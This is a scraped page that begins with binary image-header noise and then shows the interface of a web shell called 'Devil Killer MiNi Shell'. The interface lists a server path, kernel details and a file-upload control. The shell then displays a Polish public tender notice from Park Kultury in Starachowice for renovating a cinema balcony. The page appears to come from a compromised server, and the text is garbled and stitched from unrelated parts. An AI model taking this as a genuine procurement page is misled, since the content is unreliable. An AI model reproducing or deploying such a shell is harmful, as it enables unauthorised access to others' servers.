JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240923/0051236301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont balkonu Sali kinowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PARK KULTURY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 290623242</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Radomska 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Starachowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">oferty@parkkultury.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">parkkultury.starachowice.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont balkonu Sali kinowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8e63b245-e915-438b-bc80-404342686ae0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00512363</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00055692/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont pomieszczeń administracyjnych na parterze budynku Parku Kultury, remont balkonu sali kinowej w budynku Parku Kultury</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8e63b245-e915-438b-bc80-404342686ae0 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu, z<br/>wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu , odbywa się drogą elektroniczną za<br/>pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem<br/>„Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie<br/>odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj<br/>załącznik”).<br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym ,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>2. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>3. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>5. Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres: e-mail: marek.zelazko@ekomuzeum.pl (nie<br/>dotyczy składania ofert).<br/>6. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>7. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) – dalej: RODO,<br/>informujemy, że administratorem Pani/Pana danych osobowych jest:<br/>- Park Kultury w Starachowicach, ul. Radomska 21, 27-200 Starachowice<br/>- Na podstawie obowiązujących przepisów, wyznaczyliśmy Inspektora Ochrony anych, z którym można kontaktować się:<br/>- -listownie na adres: Małgorzata Zieja Park Kultury, ul. Radomska 21, 27-200 Starachowice, tel. (41) 275-65-25.<br/>-- przez e-mail: m.zieja@parkkultury.eu<br/>-Dane osobowe przetwarzane będą na podstawie art. 18 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego.<br/>- Obiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania na zasadach<br/>określonych w art. 8 oraz art. 74 ustawy PZP”.<br/>- Dane osobowe będą przechowywane, na zasadach określonych w art. 78 ust. 1 ustawy Pzp, przez okres min. 4 lat oddniazakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania udzielonej gwarancji przekracza okres 4 lat, okres<br/>przechowywania obejmuje cały czas trwania umowy oraz gwarancji udzielonej przez Wykonawcę.<br/>- Obowiązek podania danych osobowych jest niezbędny do dokonania wyboru oferty i zawarcia umowy, w przypadku niepodania<br/>danych nie będzie możliwy wybór oferty i zawarcie umowy;<br/>- W odniesieniu do pozyskanych danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO.<br/>- Osoba fizyczna, której dane osobowe przekazano Zamawiającemu posiada:<br/>-- na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych;<br/>-- na podstawie art. 16 RODO prawo do sprostowania danych osobowych,<br/>-- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>-- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, w przypadku uznania, że przetwarzanie danych<br/>osobowych narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie fizycznej, której dane osobowe przekazano Zamawiającemu nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PK.260.12.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.2.1. Roboty rozbiórkowe:<br/>3.2.1.1. Rozebranie drewnianych podłóg,<br/>3.2.1.2. Rozebranie konstrukcji drewnianej widowni podniesionej<br/>3.2.1.3. Rozebranie ścianek działowych drewnianych<br/>3.2.1.4. Rozebranie stropów drewnianych, zasypki stropowe<br/>3.2.1.5. Usuniecie gruzu z budynku<br/>3.2.1.6. Wywóz gruzu<br/>3.2.1.7. Utylizacja materiału pochodzącego z rozbiórki<br/>3.2.2. Zaprojektowanie i wykonanie konstrukcji podłogi i podestu pod fotele:<br/>3.2.2.1. Konstrukcja stalowa widowni wraz z wykonaniem projektu warsztatowego,<br/>3.2.2.2. ślepa podłoga, z desek szerokości 15-20˙cm<br/>3.2.2.3. Izolacje przeciwwilgociowe i przeciwwodne z folii polietylenowej szerokiej, izolacja pozioma podposadzkowa<br/>3.2.2.4. Izolacje cieplne i przeciwdźwiękowe z wełny mineralnej, pozioma z płyt układanych na sucho,<br/>3.2.2.5. zolacja pozioma paroizolacja<br/>3.2.3. Posadzki:<br/>3.2.3.1. Posadzki z wykładzin<br/>3.2.4. Okładziny ścian:<br/>3.2.4.1. Wykonanie okładziny akustycznej scian balkonu, okładziny wykonac w takiej samej technologii i z takich samych materiałów jak okładziny scian sali kinowej,<br/>3.2.4.2. Dostawa i montaż balustrad<br/>3.2.4.3. Renowacja istniejących słupów balkonu<br/>3.2.5. Wyposażenie:<br/>3.2.5.1. Dostawa i montaż foteli kinowych<br/>3.2.6. Instalacja oświetleniowa:<br/>3.2.6.1. Wykonanie projektu instalacji elektrycznej<br/>3.2.6.2. Wypusty oświetleniowe i gniazd wtykowych wykonywane przewodami wtynkowymi w budynkach mieszkalnych,<br/>3.2.6.3. Dostawa i montaż linii oświetlenia LED </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">79930000-2 - Specjalne usługi projektowe</p> <p class="mb-0">39100000-3 - Meble</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>-Cena oferty (C)	waga 60 pkt.<br/>- Gwarancja(G)	waga 40pkt.<br/>2. Sposób obliczenia liczby punktów w kryterium „cena oferty” (C): Liczba punktów = ( C min)/(Cb)* 60 gdzie: C min - najniższa cena spośród wszystkich ofert Cb - cena badanej oferty. Liczba punktów uzyskanych przez ofertę w kryterium „cena oferty” (C) podana będzie z dokładnością do dwóch miejsc po przecinku. Maksymalna liczba punktów jaką może uzyskać oferta w kryterium „cena oferty” (C): 60 punktów.<br/>3. Sposób obliczenia liczby punktów w kryterium „okres gwarancji” (G):<br/>Przedmiotowe kryterium oceny dotyczy okresu na jaki Wykonawca udziela gwarancji za wady fizyczne przedmiotu zamówienia.<br/>Punkty w przedmiotowym kryterium będą przyznane w przypadku gdy Wykonawca zaoferuje przedłużoną gwarancję w stosunku do wymaganego przez Zamawiającego minimalnego okresu gwarancji wynoszącego 36 miesięcy. Uwaga: Okres o jaki Wykonawca wydłuża gwarancję ponad wymaganie przez Zamawiającego minimum (tzw. długość gwarancji ponad wymagany przez Zamawiającego minimalny okres gwarancji) Wykonawca podaje w formularzu ofertowym.<br/>Wydłużenie przez Wykonawcę okresu gwarancji w stosunku do wymaganego przez Zamawiającego minimalnego okresu gwarancji o okres powyżej 60 miesięcy nie będzie premiowane przez Zamawiającego. Tym samym, do celów wyliczenia liczby punktów uzyskanych przez ofertę tego Wykonawcy w niniejszym kryterium, jako długość gwarancji ponad wymagany przez Zamawiającego minimalny okres gwarancji przyjęty zostanie okres 60 miesięczny, a nie okres podany przez Wykonawcę w ofercie.<br/>Liczba punktów uzyskanych przez ofertę w kryterium „okres gwarancji” (G): G = Gb/60 x 40 gdzie G – liczba punktów uzyskanych przez ofertę w kryterium „okres gwarancji”, Gb – długość gwarancji ponad wymaganą długość gwarancji minimalnej w miesiącach w badanej ofercie. Liczba punktów uzyskanych przez ofertę w kryterium „okres gwarancji” (G) podana będzie z dokładnością do dwóch miejsc po przecinku. Maksymalna liczba punktów jaka może uzyskać oferta w kryterium „okres gwarancji” (G): 40 punktów.” <br/>4. Ocena końcowa oferty w punktach (Ok):<br/>Ocena końcowa oferty w punktach zostanie wyliczona wg wzoru: Ok=C+G.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma łącznie najwyższą liczbę punktów w ocenie końcowej (Ok).<br/>5. Jeżeli Zamawiający nie może dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert. Zamawiający wybiera ofertę według zasad określonych w art. 248 i następnych ustawy PZP.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie, o którym<br/>mowa w art.125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia wskazanych przez Zamawiającego, czyli art. 108 ust. 1 oraz art.<br/>7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego.<br/>Podmiotowe środki dowodowe składane na wezwanie Zamawiającego przez<br/>Wykonawcę, którego oferta została najwyżej oceniona:<br/>- oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy PZP, o<br/>braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej<br/>samej grupy kapitałowej</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Dotyczy Wykonawców wspólnie ubiegających się o udzielenie zamówienia: oświadczenie, z którego wynika, które roboty budowlane/usługi wykonują poszczególni Wykonawcy (wypełniony załącznik nr 3 do SWZ)<br/>2. odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania; Uwaga: Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów;<br/>3. pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy - jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów, o których mowa w punkcie powyżej <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,<br/>2) wszyscy wykonawcy występujący wspólnie muszą upoważnić na piśmie pod rygorem nieważności (art. 99 § 2 K.c.) ustanowionego pełnomocnika, jako przedstawiciela pozostałych, a jego upoważnienie musi być udokumentowane pełnomocnictwem przez upełnomocnionych przedstawicieli wszystkich pozostałych wykonawców i dołączone do składanej oferty,<br/>3) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,<br/>4) z treści formularza ofertowego powinno wynikać, że oferta, składana jest w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>5) w miejscach dotyczących danych poszczególnych wykonawców (nazwa, adres, NIP, REGON, kategorię przedsiębiorstwa, do której należy) należy wpisać stosowne dane dotyczące poszczególnych Wykonawców wspólnie ubiegających się o zamówienie.<br/>6) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem wymienionym w pełnomocnictwie, występującym jako reprezentant pozostałych.<br/>7) Oświadczenie o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia wskazanych przez Zamawiającego, czyli art. 108 ust. 1 oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu 